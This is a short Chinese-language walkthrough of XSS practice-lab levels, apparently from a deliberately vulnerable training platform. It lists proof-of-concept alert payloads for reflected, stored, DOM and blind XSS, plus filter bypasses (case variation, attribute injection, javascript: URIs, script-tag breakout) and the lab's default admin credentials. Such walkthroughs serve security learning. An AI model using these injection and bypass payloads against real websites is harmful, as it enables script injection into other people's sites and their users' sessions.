1、反射型xss(get)
在url直接输入 <script>alert(1)</script>
<script>alert(1)</script>
2.反射性xss(post)
先登录账号(右上角点击一下提示可得)
账号:admin密码:123456
<script>alert(1)</script>
3、存储型xss
同样输入 <script>alert(1)</script>
4、DOM型xss
检查代码可得输入内容转化为超链接,输入相关的网页地址即可,如http://baidu.com
5、DOM型xss-x
' οnclick="alert('xss')">
6、xss盲打
现在输入框内分别输入下列代码,点击提交,发现没反应,接着点击右上角提示登陆后台
<script>alert('xss1')</script>
<script>alert('xss2')</script>
在原url上补充/admin_login.php
登录账号admin密码123456,点击Login则会有弹窗
7、 xss之过滤(大小写绕过)
<Script>alert(1)</Script>
8、xss之htmlspecialchars
'onclick='alert(1)'
9 、xss之href输出
javascript:alert(1)
10、xss之js输出
</script><script>alert(1)</script>